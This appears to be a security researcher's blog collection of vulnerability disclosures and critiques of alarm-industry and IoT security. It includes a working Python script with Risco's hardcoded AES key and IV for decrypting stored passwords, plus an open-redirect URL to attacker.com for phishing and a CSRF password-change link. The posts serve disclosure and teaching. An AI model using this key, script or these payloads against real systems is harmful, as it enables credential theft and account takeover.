Vulnerability in password storage in Risco Configuration Software

During a routine pen-test of an alarm receiving centre, a piece of software was found that was used to remotely configure Risco alarms.

The software is backed by a SQL database called “ConfigurationSoftware” which contains a table called ut_Users with a column called PWD which stores passwords for users that can log into the system.

This PWD field appeared to be a base64 encoded string.

On further investigation, this password was stored in an encrypted form. This allows it to be recovered from the software, and doesn’t follow best practices of hashing passwords.

The encryption is AES-256 and uses a fixed key and IV which is hardcoded into the application.

Passwords were recovered from the database which, due to password re-use, allowed me to take control of the domain controller and website of the company. The password was of good complexity, so if hashing had been used, I would have been unlikely to have recovered this.

A Python script to decrypt the passwords is shown below.

from Crypto.Cipher import AES
from Crypto import Random
import base64

BS = 32
# PKCS #7
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]

def encrypt(raw, key, iv ):
    raw = pad(raw)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return (cipher.encrypt(raw ))

def decrypt(enc, key, iv ):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(enc))

# Static and hardcoded
key = 'FKLe608FDsF5J6ZaKpTghjED7Hb80ALq'
iv = 'Sckt6DopykVCD9Lq'

# The default 123 password as installed
ciphertext = 'BQqwo4a87TvfJKv4af8h3g=='

print 'Password is %s' % decrypt(base64.b64decode(ciphertext), key, iv).decode('utf-16-le')

This was reported to Risco on 7th August. A fix is meant to be deployed at the beginning of November.

Conclusion

  • Hash, don’t encrypt your passwords.
  • Don’t hardcode encryption keys in your software
  • Don’t use the same password for domain admin as in a system of unknown quality
  • Have a security contact so it’s not painful to report issues

Terrible website security on www.apprentices4fs.com

Companies in the physical security world often seem to have awful virtual security.

This site – “Apprentices for Fire & Security” – is a prime example of absolutely awful virtual security. And once again, these are not subtle issues – they are indicative of incompetent developers working on the security aspects of a website. Stop entrusting your security to people who do not know what they are doing.

Let us go through the obvious issues:

No HTTPS anywhere

The site handles passwords, emails, addresses, names, CVs, job postings. This is confidential information.

None of this is protected by HTTPS. It is all sent in the plain.

This is not forgiveable in 2015. It is embarrassing that anyone can deploy a site handling logins and CVs without it.

Update: as of mid-morning 9/11, HTTPS has been turned on for apprentices4fs.com and some other domains. You have to ask, why was this not done in the first place?

Passwords are emailed to users

When you setup your account, you chose a password. This password is immediately emailed to you.

This means that your password has now been sent in the plain across the Internet.

This is not good practice for very obvious reasons.

Passwords are stored in the plain

When you fill in the password reminder, your original password is emailed to you. This means the passwords are not hashed.

This means that if the database was to leak, it would reveal all the passwords.

This is terrible practice and it is widely known that it is terrible practice.

Passwords are truncated

Enter a 100 character password, and send a password reminder. The plain text password is now only 20 characters long.

This is a side effect of plain text password storage. If you store the password in the plain, you have to limit the password length to something. If you hash the password, the password could be “War & Peace” and the hash would still be of a fixed length.

This is terrible practice.

Passwords are not case sensitive

If you set your password to AAAAAA, you can login to the system with aaaaaa.

Even if you are using plain text storage, you don’t need to do this.

This massively reduces the number of different passwords available.

This is terrible practice.

Detailed error logging is turned on

If an error occurs, you are given a detailed error log.

This leaks information such as the directory structure, what attack mitigation rules are in place and so on. Sometimes these error logs can even leak things like usernames and passwords.

They should be turned off on a production server. This is web admin 101.

Open redirect on login form

Often when you access a page that requires authentication, a site will pass a referrer (i.e. the page you were on) to to the login page. This is so you are seamlessly returned to the page you wanted to access, after logging in.

It’s absolutely vital that this referrer URL is not a free choice.

Why? Picture this attack.

The attacker sends this URL to the victim:

www.apprentices4fs.com/jobboard/cands/candLogin.asp?r=http://attacker.com/fakelogin.html

The victim logs in to the real site, and are redirected to the attacker’s fake login page. This fake page says that the victim has entered their password incorrectly.

The victim logs in again. His credentials are stored by the attacker, and he is returned to the genuine site.

This is a glaringly obvious issue and very serious.

No protection against cross-site request forgery

There is no evidence of any protection against cross-site request forgery (CSRF). This includes pages used to change passwords and other details.

Cross-site request forgery means I can send a crafted link to a user (e.g. by email), and if they click on the link, the action will be carried out as the user.

A very simple example would be something like:

www.apprentices4fs.com/jobboard/cands/candLogin.asp?password=ABCDEF

And the logged in user would have their password changed to ABCDEF.

The actual mechanics are more complex than this. Regardless, you cannot deploy a public facing website dealing with logins or confidential information without CSRF protection.

Cookies don’t have HTTPOnly flag set.

Cookies are used to remember that you are logged into a site using something called a session token. If you get hold of someone else’s session token, you can act as if you were logged in as them.

A common attack is to steal a cookie by making the browser run malicious Javascript (exploiting a vulnerability called XSS) that sends the cookie to an attacker.

The HTTPOnly flag prevents Javascript from reading the cookie. It makes stealing the cookie much harder. Above all, nearly all of the time, there is no penalty to setting it. It has no downsides

Again, this is basic stuff.

An arsehole security warning

Do anything they don’t like, and you get this. (which has since been made 403).

There’s a strong correlation, in my experience, between OTT warnings like this and incompetence.

Overzealous XXS filters

It’s vital you protect your site from an attack called XSS, where an attacker tries to inject their own JavaScript into your pages.

There are a number of ways of doing this. You can detect basic attempts and warn a user that there is an issue, probably logging the issue and alerting admins. If there is persistent and realistic threat, start banning IPs.

Immediately locking the IP out and issuing them with a ridiculous warning it not how to do XSS protection.

Visit the search page and search for <script>. Or just click here to do it for you. Be warned you will be banned from the site.

This has since been hidden, but someone had kindly screenshotted it:

WhoopWhoopTheInternetPolice

In my experience of looking at over 100 sites, the ones that react to XSS like this tend to have wholly ineffective XSS filters – they only deal with the very obvious, and can be subverted. It’s like putting up a “Warning – Guard Dogs” sign, without the guard dogs.

Totally ineffective banning

If you trigger the overzealous XSS filters, you are banned. Or so it says.

That is, unless you use another browser. Or just manually change the user agent.

I suspect they have done this because otherwise you could easily perform a denial-of-service attack by blocking from many IPs.

This banning is token at best, and provides no extra security.

No security contact

Well, no contact at all. What do you have to do to get these people to respond to a security issue?

Conclusion

The security of this site is about as bad as it can get without just leaving everything in the open. There has been little to no regard to the security of the data or users. This is to the level that it is either extreme incompetence or negligence.

What is more worrying is that the people who developed this sell it as a product.

And, of course, who is behind this particular site? CSL Dualcom.

Update

99 other sites running software by the same company.

http://www.ballandhoolahan.co.uk/
http://www.scotjobsnet.co.uk/
http://www.careersforcare.co.uk/
http://www.bacme.com/
http://www.nqajobs.com
http://www.executive-careers.com
http://www.qualityjobs.org.uk
http://www.speech-language-therapy-jobs.org
http://www.sci-search.com
http://www.hawkinsthompson.com
http://www.barringtonjames.com
http://www.cybersecurityjobsite.com
http://www.renewablesjobshop.co.uk
http://www.forwardingjobs.com
http://www.gamesjobsdirect.com
http://jobs.midwives.co.uk
http://www.jobswithballs.com
http://www.computerjobs.ie/
http://www.housebuildingcareers.co.uk
http://www.hozpitality.ca
http://www.audiovisualjobs.com
http://www.medicaldirectorjobs.co.uk
http://jobs.bsee.co.uk
http://www.britishmedicaljobs.com
http://jobs.legalsupportnetwork.co.uk
http://www.mbmtravelexecutives.co.uk
http://www.understandingrecruitment.co.uk
http://www.robertsonbell.co.uk
http://www.thedovepartnership.co.uk
http://www.risetechnicalrecruitment.co.uk
http://www.balancerecruitment.com
http://www.atkinsonpage.co.uk
http://www.charismarecruitment.co.uk
http://www.cornucopiaitr.com
http://www.dnarecruit.com
http://www.talentcrew.co.uk
http://www.synergizecl.co.uk
http://www.primeuk.com
http://www.astoncharles.co.uk
http://www.adept-recruitment.co.uk
http://www.pensioncareers.co.uk
http://www.lawrencedeanrecruitment.co.uk
http://www.signetresources.co.uk
http://www.abikaconsulting.com
http://www.f10.co.uk
http://www.robertgilesagencies.com
http://www.esprecruitment.co.uk
http://www.market-recruitment.co.uk
http://www.creativepersonnel.co.uk
http://www.quicksilverjobs.co.uk
http://www.mitchellmaguire.co.uk
http://www.jimmyredrecruitment.com
http://www.westinpar.com
http://www.thesjbgroup.com
http://www.autoskills-uk.com
http://www.medtechsearch.co.uk
http://www.michaelbaileyassociates.com
http://www.encorepersonnel.co.uk
http://www.scanlonsearch.com
http://www.liquidhc.com
http://www.bodenresource.co.uk
http://www.gpa-procurement.com
http://www.lawconsultants.co.uk
http://www.demobjob.co.uk
http://www.cameronbrook.co.uk
http://www.clayton-recruitment.co.uk
http://www.ceemarecruitment.co.uk
http://www.craconsultants.com
http://www.pro-tax.co.uk
http://www.theoceanpartnership.com
http://www.agrifj.co.uk
http://www.bluecrestrecruitment.co.uk
http://www.brightleaf.co.uk
http://www.sterlingcross.com
http://www.fireandsecurityjobs.com
http://www.cprecruitment.co.uk/
http://www.academicsltd.com.au
http://www.centopersonnel.com
http://www.navis-consulting.com
http://www.oswinstrauss.com
http://www.eatjobs.co.uk/
http://www.oysterpartnership.com
http://www.oceanicresources.com
http://www.greenjobs.ie
http://www.pro-finance.co.uk
http://www.branwellford.co.uk
http://jobs.pmlive.com
http://www.creampersonnel.co.uk
http://www.acfinancial.co.uk
http://www.kasus.co.uk
http://www.liftandescalatorjobs.com
http://jobs.nasaconsulting.com
http://www.careersforcare.co.uk
http://www.kbbrecruitment.co.uk
http://www.nwmjobs.co.uk
http://www.i-payejobs.com
http://www.racsgroupjobs.com
http://jobs.paystream.co.uk
http://www.buildingproductjobs.com

They have 99 problems, but their HTTPS configuration isn’t one, because they don’t use it.

Why you shouldn’t listen to Pat Burns on LinkedIn

An article entitled “Why The Internet of Things and the Cloud Should Break Up” showed up on Reddit and Twitter earlier this week. It sounded promising – I’m a proponent of decoupling IoT systems so that they don’t rely on the cloud, even if they still use the cloud most of the time. What I was greeted with was a terrible opinion piece, full of misinformation.

I don’t know where to start, it’s so bad.

A FitBit wristband connects via Bluetooth with your smartphone but sends your activity data to a FitBit cloud app. Does your personal health data really need to sit in the cloud or can you extract sufficient value from it by simply keeping the data stored locally on your smartphone?

This isn’t the IoT. That’s a Bluetooth device connecting to a phone. He seems to be one of these people who will call anything connected and not a full blown machine “IoT”.

For most of the IT industry — let’s just get this on the table — the cloud today is the hammer and there’s almost nothing that isn’t a nail. And the cloud is an easy place to build an IoT application and operates without the messy hassles of embedded software, endpoint security, FCC regulations, or fertility risks, to name a few.

Firstly, using the cloud generally means adding functionality to endpoints. Take a standard IP camera, accepting connections on port 80, using port-forwarding for remote access. Add cloud functionality to allow remote streaming and the system takes more time to develop. It is not a freebie.

Secondly, using the cloud normally makes endpoint security much less of an issue. Traditional architectures, such as port-forwarding to devices, or customers running their own infrastructure, involve inbound connections to your network and endpoints. Many cloud connected devices have absolutely no ports open at all – SmartThings v2 hub for example. Because of this, endpoint security becomes a lot less difficult.

Thirdly, regardless of your architecture, if you want to use wireless connectivity, you need to deal with RF. I don’t see how the cloud avoids this.

It’s cheap and everywhere. Like beer in your dorm, the cloud today is so popular and so well-capitalized that infecting the IoT was only a matter of when, not if. Spin-offs like cloud analytics or cloud perimeter security (no laughing!) are simply too affordable and too visible to pass up. Traditional enterprise IoT pilots that used to cost $250,000 in enterprise software and systems integration services can be executed at a fraction of this price now due to the cloud.

Developing cloud systems and operating robust, secure cloud systems is a cost and complexity. People are not doing it to avoid cost.

Tools. Compared to older desktop-based tools, cloud-based environments and API’s are vastly simpler to use and integrate while offering robust functionality.

He seems to be conflating using a cloud-based development environment with operating in the cloud. Nearly all cloud based solutions need significant development in traditional languages, on a desktop. It’s not point and click.

Weak endpoints and edges. Endpoints that don’t do analytics, support real-time queries, or even support full two-way messaging tend to spew data remorselessly to an edge router and/or the cloud. Bluetooth, ZigBee, 6lowPAN, and others are all guilty as charged and as a result, they end up driving their users to the cloud.

He seems to have a bee in his bonnet about how “stealthy” wireless protocols are. There really is no link between the wireless protocol used and how much data ends up getting sent to the cloud. They are different layers – one a transport protocol, the other application. Zigbee does send a fair amount of beacon traffic, but none of this ends up outside the PAN. If your app sends a lot of traffic over Zigbee and then your gateway sends it to the cloud, that is not the fault of Zigbee.

It’s not secure. This one is hard to overstate as crummy IoT security is the sordid “yeah, but” in so many discussions about the IoT. IDC predictsthat nearly every IT network will have an IoT security breach by the end of 2016 and IT departments are in full freakout mode now. Endpoint security is comically bad and compounded with a hacker-friendly cloud, what could go wrong?

There is absolutely nothing inherent in the cloud architecture that makes it insecure. In fact, there can be a lot of advantages:

  • Endpoints no longer need to accept any incoming connections
  • Endpoints and gateways accept no user-input, massively simplifying design of secure interfaces
  • Connecting to a central point facilitates use of IDS, a skilled operations team, and regular centralised updates

Equally, there is nothing inherent in a cloud architecture that means the endpoints are insecure. An insecure endpoint will be insecure regardless of the architecture.

It’s not real-time. IoT apps that require real-time responses can’t tolerate the extra seconds or minutes required for a cloud lookup.

and later:

Waiting 2–3minutes for a cloud app to make time for you is a non-starter.

This is just pure misinformation. Going over the Internet adds latency. It doesn’t add “2-3 minutes”, it adds milliseconds typically. 2-3 minutes means the system has been designed badly, and this would be an issue regardless of where it operates.

It may not be faithful. The integrity of your data in the cloud is only as good as the people and systems hosting it. Sensors in your manufacturing facility in Taipei showing you running at 50% below your normal run rate or showing a supply chain hiccup? Hedge funds and competitors enjoy learning about this kind thing!

The integrity of your data on your self-hosted platform is only as good as the people and systems hosting it. Again, nothing inherent about cloud. I would rather have a skilled operations team managing intrusion detection, performance monitoring and disaster recovery than burden a sysadmin with yet another system in-house.

Getting out may be easier than getting in. Once you’ve married a cloud service, how easy will it be to disengage/migrate to another solution at some future date? Is standardization and interoperability in a state that will increase the risk of vendor lock-in? What if the cloud vendor is bought by your competitor and changes policies?

Which is equally true of any bought-in platform. Just remove the word “cloud” from the above paragraph. Vendor lock-in is real however.

A new golden rule of IoT network design is to store sensor data as close as possible to its point of origin and limit its sharing across the network unless absolutely necessary.

You can’t just invent golden rules. Many people want low-cost, low-power endpoints with no storage and no persistence, pushing everything to more powerful gateways or servers. The AWS and Azure IoT platforms both accommodate for this. This is Pat Burn’s golden rule, to sell his product.

The endpoint is key to the golden rule. Better processors, cheaper memory, and better networking stacks from companies like Haystack are evolving endpoints from dumb terminals to independent, distributed computing devices with real-time query (think Google for the IoT) and NoSQL-like filesystem support. Endpoint-centric designs also have the bonus of being more stealthy and secure, faster, cheaper, and better stewards of battery life and wireless bandwidth. In short, good IoT network design should begin with the endpoint in mind and “dumb” endpoint technologies that beacon or create unnecessary security risks should be phased out

I just don’t know where to begin on this.

The enemy of security is complexity. Are you actually trying to argue that having hundreds of endpoints in a distributed network, able to store data and be queried, are going to be more secure than, say, a memory-based RFID tag? Or a transmit-only 8-bit PIC based humidity sensor?

How are these endpoints cheaper?

What is his issue with beacons and stealth? Well – it’s lucky there is another article – “A Simple Proposal To Improve Security for the Internet of Things” to help us demolish yet another series of misconceptions and misinformation.

Almost every IoT security breach in recent news can be traced to the poor architecture of the wireless protocol used by the device.

No, no they can’t.

Firstly, that is very, very specific. “Poor architecture of the wireless protocol”. Not “Weak implementation of the wireless protocol” or “devices using wireless protocols”.

Secondly, neither of the links provided are breaches. A breach is the result of a system being exploited. One is information leakage, the other is a report of a vulnerability.

Thirdly, the Jeep hack was nothing to do with the wireless protocol. Jeeps could be using wired Ethernet and the same issues would have been present.

Fourthly, nearly every IoT breach in recent news has been carried out over the Internet. Not local attacks to the wireless protocol. There is a lot of research into wireless security, and there are a lot of noise at conferences, but the bulk of issues occur over the Internet remotely. Hackers are not sat outside homes and business cracking your Zigbee or wireless burglar alarm.

Avoiding or minimizing the chances of unauthorized discovery is not technically difficult. But today’s IoT technologies like Bluetooth, 6lowpan, Sigfox, LoRaWAN, and others make unauthorized discovery very easy and it creates the worst kind of angst in IT departments.

Most of the protocols make discovery easy because it is intentional. They layer security with discoverability, enabling systems which people can actually use and are actually deployed (unlike Dash7).

The link doesn’t support that unauthorised discovery is causing angst in IT departments. He seems to often do this – provide a link which is vaguely related but doesn’t support the argument. It would be fair to say “IoT is causing angst in IT departments”.

Most wireless IoT technologies were originally conceived as ways to stream large files (Bluetooth, WiFi) while some were designed to be “lighter” versions of WiFi (e.g., ZigBee). Today they are being re-positioned as “IoT” technologies and security, to put it nicely, is an afterthought. Oh yes — some have tried to “layer on” security and may profess to support encryption

Layering encryption onto a transport protocol is completely valid. It’s widely acknowledge that ZigBee, Z-Wave and WiFi, if implemented correctly, are secure from the risk profile that is involved. Skilled hackers are not sat outside your house, waiting for you to pair you Hue bulbs to the hub and grab the keys. It is not happening. Even if they did, all they can do is turn your lights on and off.

I have no idea why they “profess” to support encryption. They all offer encryption. WPA2 is actually a very secure protocol.

hacks for all of these technologies are quite public yet fundamentally traceable to one original sin:

these wireless IoT technologies don’t know how to keep quiet.

What? What hacks of wireless protocols can be traced to not keeping quiet?

More recently, drones are being used to hunt for ZigBee-based endpoints, giving bad actors an easy way to discover, map, and hack ZigBee endpoints:

No, drones are being used to map Zigbee broadcast traffic. This is not enabling anyone to hack Zigbee anymore than putting your house number on the door of your house enables someone to pick your locks.

this type of hack provides all sorts of information about each endpoint, including manufacturer ID.

This is not a hack.

This need to be “discoverable” — and this is not limited to ZigBee, Bluetooth or WiFi but to most wireless IoT technologies — requires a near-constant advertising of a device’s presence, leading to any number of “disaster scenarios” that others have extensively written about.

The link, again, doesn’t support that a wireless protocol being discoverable will lead to any disaster scenario. Just pile the links on and hope no one checks.

There is no technical reason that the Internet of Things cannot embrace silence, or stealth as I prefer to call it, as a first principle of endpoint security. Stealth is not a silver bullet for IoT security (there is no silver bullet) and stealth alone won’t protect a network from intrusions, but dollar-for-dollar, stealth is the simplest, cheapest, and most effective form of IoT security protection available.

There is, quite literally, nothing to support this position.

A endpoint, receiving and sending plaintext, unauthenticated commands and data, will not see a noticeable improvement in security. Passive monitoring of the channel will still leak data, and active tampering will cause havoc. The stealth must be broken for the device to send, and this can be seen.

An endpoint, receiving and sending encrypted, authenticated commands and data, will not see a noticeable improvement in security. The data is still encrypted. Unauthenticated commands won’t be carried out.

This is just garbage.

Dollar for dollar, it might be worth making your nodes quieter, but not at the cost of switching from a widely adopted, widely inspected wireless standard to Dash7.

He tries to explain why:

Cloaking. It is harder to discover, hack, spoof, and/or “stalk” an endpoint if a hacker cannot locate the endpoint.

Endpoints need to send. Being stealthy can reduce the traffic but there will still be traffic. Stealth is only a weak layer of security through obscurity.

Googling the IoT. Stealth enables real-time queries of endpoints, a la Google search that non-stealthy endpoints can’t support. Stealth also enables fast queries (<2 seconds) in environments with thousands of endpoints, in turn enabling big data analytics at the true edge of the network.

This has absolutely nothing to do with how stealthy communications are from the node. If you enable your node to be queried, it can be queried. In fact, querying and accessing data from the edge of a network almost negates attempts at being stealthy as you will see an increase in complex and important traffic of the wireless network.

Minimize interference. Less data being transmitted minimizes the opportunities for interference and failed message transmissions. Contrast this with the tragedy of the commons at 2.45 GHz, where WiFi, ZigBee, microwave ovens, and other countless other technologies engage in wireless gladiatorial combat and cause too many customers to return their IoT gadgets because they “don’t work”.

Again, this has very little to do with stealth. 434MHz – that Dash7 uses – has as many issues with contention as 2.4Ghz. In the UK, there are many more poor quality, untested, non-standards compliant transmitters in the 434MHz band than there are on 2.4Ghz.

Access control. Stealthy endpoints make it easier to control access to the endpoint by limiting who can query the endpoint.

Again, absolutely no link between stealth and access control. If you limit access to something, you limit access to it.

Storage. Less data being transmitted reduces storage costs. Storage vendors, on the other hand, love the non-stealthy IoT status quo.

Again, what? If your endpoint decides to ditch data, then your cloud can also decide to ditch data. This has nothing to do with stealth of the wireless protocol – it’s about volume of data at the application layer.

At this point, I’m bored of this. These articles are utter crap.

 

 

 

InSecurTek Monitoring

Update

The director of IT from Securtek got in touch via the contact form. They are working to fix these issues, and his response was measured and reasonable, especially in light of my rather inflammatory blog post.

Thank you for bringing this to our attention.  We will be taking steps immediately to correct this situation, both in the short-term and in the long-term.
– Bryan Watson, Director of IT, SecurTek Monitoring Solutions

Introduction

Another security industry website, another slew of basic mistakes.

SecurTek are a Canadian company who offer alarm monitoring. Even just a cursory glance at their system shows that they are ignoring basic security principles.

No HTTPS

The login page is lacking HTTPS. There is no excuse for this in 2015 for a commercial web service of any form.

No HTTPS

No HTTPS

Username enumeration

The login form responds different depending on if the user exists or not.

Username not found

Username not found

This might seem minor, but it massively facilitates brute-forcing usernames and passwords by removing one of the unknowns. Best practice is to indicate that you have entered an incorrect username or password.

Passwords are stored in the plain

The forgotten password functionality simply emails you the password you have already set.

Password in the plain

Password in the plain

This has several implications.

It means that your password is stored in a way in which it can be retreived. Whilst it may be encrypted, this encryption can be reversed, yielding a password. This is not good and nowhere near best practice. Passwords should be hashed at the bare minimum, which prevents them being recovered in this way.

Email is not a secure way of delivering a password. There is the potential for many people to see this password. With password re-use being common, obtaining the password for SecurTek could yield access to many other systems. A password reset mechanism should use a random token and be time-limited.

Conclusion

This is a 2-minute glance at security, and it’s shown two very serious issues and one reasonably serious. They aren’t subtle issues.

Would you trust a company with your alarm monitoring if they can’t do these things right?

You don’t need to read or agree to a EULA to extract binaries

Impero Software have sent a particularly dickish letter to @TheWack0lian after he raised a security vulnerability (unauthenticated user remote command execution) in their software.

Impero’s entire complaint seems to be that their End User License Agreement (EULA) has been breached. Explicitly stated in the letter is that @TheWack0lian must have agreed to the EULA to mess around with the software. Really?

Letter extract

Let me tell you a secret, Impero and Gateley Plc

If you make your software downloadable (link dead now), you don’t need to run the installer to see what is inside it.

Windows has built in tools that can unpack most MSI files. 7zip deals with the bulk of the rest. For those left, lessmsi will unpack them.

This exactly the route I took after I downloaded Impero’s software – simply unpacked it and started hacking.

Files in MSI

You could have handled this well, instead I know that there are now at least three 0-days out there for the Impero software.

Stop doing client-side password hashing

Right, this has come up enough to write a post about it.

Stop hashing passwords on the client-side and sending the hash in the clear. It is not a substitute for HTTPS!

Here is an example of this being done on the DSC Security website. Go to “Security Professional Login”, and you get a pop-up login box. It looks like JavaScript is involved.

Note that the login page is served over HTTP (not HTTPS). This doesn’t always mean that the login credentials are passed over HTTP though. Sometimes the HTTP form submits to a HTTPS page.

This is still bad from a security perspective as the attacker can deliver you a malignant login form that submits credentials to a server under his control.

Regardless, DSC aren’t doing anything over HTTPS – it’s all HTTP – so it is all sent in the plain. HTTPS is essentially free these days – there is no excuse to not use it.

That said, it appears that someone at DSC has realised that HTTP a bad idea, so they have implemented… a thingy. A thingy that does little to improve security.

Here is the query that they send when I entered test/test:

GET /index.php?o=login&user=test&pwd=098f6bcd4621d373cade4e832627b4f6&remember=yes HTTP/1.1

So that parameter pwd isn’t test. What is it?

Let’s look at the JavaScript powering the site.

function login() {
    el = document.getElementById("lusername");
    el2 = document.getElementById("lpassword");
    el3 = document.getElementById("remember");
    url = "/index.php?o=login&user=" + encode(el.value) + "&pwd=" + md5(el2.value);
    if (el3 && el3.checked)
    {
        url += "&remember=yes";
    }
    initObj();
    showWait();
    if (xmlhttp!=null) {
      xmlhttp.onreadystatechange=_login;
      xmlhttp.open("GET",url,true);
      xmlhttp.setRequestHeader( "If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT" );
      xmlhttp.send(null);
    } else {
        url2 = "/index.php?o=login2&user=" + encode(el.value) + "&pwd=" + md5(el2.value);
        if (el3 && el3.checked)
        {
            url2 += "&remember=yes";
        }
        window.location=url2;
    }
}

Yes – it’s MD5ing the unsalted password test and submitting the hash.

A passive observer of the traffic can still just sniff a single login and re-use the hash to login to DSC. They don’t need to know the password.

A passive observer could obtain the password by cracking the MD5 hash. Because it is un-salted, the hash of can even be googled to find the password. Salting is essential when using a hash to store passwords.

Even if the attacker couldn’t get the password by passive observation and cracking, they could simply serve up a login page that submits the original password to a server under their control.

This isn’t the first, second, third, fourth or even fifth time I have seen this. It’s useless. Stop doing it!

Note that DSC are also passing sensitive parameters as GET rather than POST. This means that the hash is stored in your URL history, proxies between you and the server etc.

 

 

 

Insecure CSL Dualcom mobile app

CSL Dualcom, the intruder alarm signalling provider, recently released a mobile app. It’s aimed at installers, and appears to allow them to perform site surveys (see signal strength for different networks) and view the status of devices they have installed. The promotional video also shows two pieces of data – ICCID and chip number – that, in my opinion, could be used to clone the CSL Dualcom device.

From promotional video

From promotional video

This is relatively sensitive data so I thought I’d take a quick look at the security measures they have taken in the app.

Unfortunately a number of basic and unforgiveable mistakes have been made.

Using Burp Suite, I proxied the traffic between the iOS app and CSL to see what was happening. I then downloaded the Android APK and viewed it in a decompiler.

No HTTPS

Nothing I can see in the traffic or app indicates that HTTPS is used anywhere – it’s all HTTP, albeit on a non-standard port 15136.

No HTTPS

No HTTPS

This means that all data sent between the app and server is sent in the plain, and can be intercepted or altered by anyone in the middle.

On a mobile app, this is totally unforgiveable, for a number of reasons:

  1. There are no cues to the user that the app is not using HTTPS. A browser makes it pretty clear when a site is using HTTPS. An app doesn’t.
  2. A mobile app can and will be used on unsecured WiFi and untrusted network connections. This massively increases your exposure to attack compared to using a trusted machine on a trusted network.

HTTPS is essentially free these days. The actual certificate is not expensive (and, for a mobile app, you can get away with self-signed and pinned certificates), and the increase in processing power required on the server and client is minimal.

Poor code quality

There are a number of signs that the code quality of the app is not up to scratch.

It sends your IMEI to their servers when it first runs, but the end-point just responds to tell you it’s invalid JSON. So you are sending sensitive information in the clear, but it’s being discarded anyway.

IMEI request

IMEI request

IMEI response

IMEI response

This is really quite sloppy and should have failed testing.

The code has typos in it e.g. IEMI, phon, etc.

Typos

Typos

Human readable error messages sent as responses end up as nonsense when presented to the user:

This makes sense…

 

But this makes no sense...

But this makes no sense…

Conclusion

I’ve not even actually logged into the app yet, but the lack of HTTPS should be enough to stop anyone from using this app.

The lack of HTTPS was reported to CSL Dualcom on the 26th June 2015. A review of the Androud app on 28th October 2015 shows that it is using HTTPS, but this has not been checked for further issues.

 

Subjects don’t need to be preserved in Certificate Signing Requests

I’ve been playing round with certificates, keys and Certificate Signing Requests (CSRs) whilst evaluating the security of an IoT solution.

I’ve had a longstanding misconception around CSRs and I thought I would document it here in case anyone else finds the same issue.

The purpose of a CSR is to request a certificate from a Certificate Authority (CA), where they sign your public key and a number of pieces of data called “subjects”. Normally these subjects, for HTTPS, are related to the domain.

The CSR in question looks like this:

root@kali:~# openssl req -in csr.req -text -noout
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: emailAddress=cybergibbon@test.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:ea:a9:04:df:20:63:6d:78:8d:a4:c3:8a:7e:b5:
                    a9:38:a7:1d:2a:75:20:90:45:2d:c9:9e:b3:08:18:
                    a9:59:d4:79:95:40:ef:cc:4f:2c:93:73:21:02:05:
                    9b:47:c4:9b:73:21:a8:fe:da:9c:2c:71:98:f5:49:
                    37:a7:28:a4:f5:14:6a:a0:91:dd:a7:87:63:d4:b4:
                    2a:aa:a6:9b:b2:a4:72:ab:91:58:2b:e5:6e:34:84:
                    05:ce:c8:dc:7f:3c:33:5f:d2:14:27:37:34:ee:aa:
                    58:29:de:5c:f5:b7:93:69:94:a9:20:02:84:fb:cd:
                    5e:04:43:56:df:c2:48:f7:41
                Exponent: 65537 (0x10001)
        Attributes:
            a0:00
    Signature Algorithm: sha1WithRSAEncryption
         01:e8:97:81:25:0b:b1:c5:9c:66:62:6f:0a:6a:00:b6:1d:6c:
         d9:17:50:20:16:42:54:4e:cb:30:c7:a3:35:bb:fd:22:a3:d6:
         73:5e:ea:2d:fb:50:39:3b:56:84:bc:3e:d1:cf:62:7c:03:b5:
         43:d7:5d:38:b8:cd:39:d1:89:09:23:44:d8:ef:17:ce:e3:5b:
         9d:2d:8a:4c:9e:45:81:a2:70:88:db:d5:aa:6c:7b:03:f2:2b:
         ee:b2:67:2f:62:3e:cf:d1:e2:fd:e4:d0:82:66:00:26:3a:6f:
         b8:f4:ff:e4:85:4f:de:d5:51:a6:a0:07:ef:33:ab:b5:d1:04:
         eb:18

This has a subject of an email address – cybergibbon@test.com and my public key. That whole lot is then signed with my private key. This allows the recipient of the CSR to verify that someone with the private key corresponding to the public key has added the data cybergibbon@test.com.

I thought the CA then signed the entire CSR, preserving the subject, and hence also my signature. It turns out that they can actually just re-write the subject and sign it – my signature is no longer involved!

Here is an example certificate received back from the CA:

root@kali:~# openssl x509 -in cybergibbon_at_test.com.crt -text -noout
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 35242 (0x89aa)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=DK, O=HackingTeam
        Validity
            Not Before: Jul  6 03:52:32 2015 GMT
            Not After : Jul  4 01:52:33 2025 GMT
        Subject: emailAddress=cybergibbons@test.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:ea:a9:04:df:20:63:6d:78:8d:a4:c3:8a:7e:b5:
                    a9:38:a7:1d:2a:75:20:90:45:2d:c9:9e:b3:08:18:
                    a9:59:d4:79:95:40:ef:cc:4f:2c:93:73:21:02:05:
                    9b:47:c4:9b:73:21:a8:fe:da:9c:2c:71:98:f5:49:
                    37:a7:28:a4:f5:14:6a:a0:91:dd:a7:87:63:d4:b4:
                    2a:aa:a6:9b:b2:a4:72:ab:91:58:2b:e5:6e:34:84:
                    05:ce:c8:dc:7f:3c:33:5f:d2:14:27:37:34:ee:aa:
                    58:29:de:5c:f5:b7:93:69:94:a9:20:02:84:fb:cd:
                    5e:04:43:56:df:c2:48:f7:41
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                49:85:CB:85:5F:EF:50:A6:2E:E1:B0:95:33:24:77:58:6C:70:C7:62
            X509v3 Authority Key Identifier: 
                keyid:65:F1:07:3D:58:53:F3:BE:1C:02:0C:B6:36:E6:3F:95:F5:60:33:E3

    Signature Algorithm: sha1WithRSAEncryption
         59:73:5f:2c:5c:19:2f:ec:db:3d:38:40:45:ed:72:d9:6b:dc:
         ac:2e:99:fa:db:ae:59:6f:aa:06:ab:73:4e:06:46:13:71:3f:
         81:2e:76:b3:4a:fb:82:cf:4c:d3:43:9f:f4:6f:08:5e:d6:22:
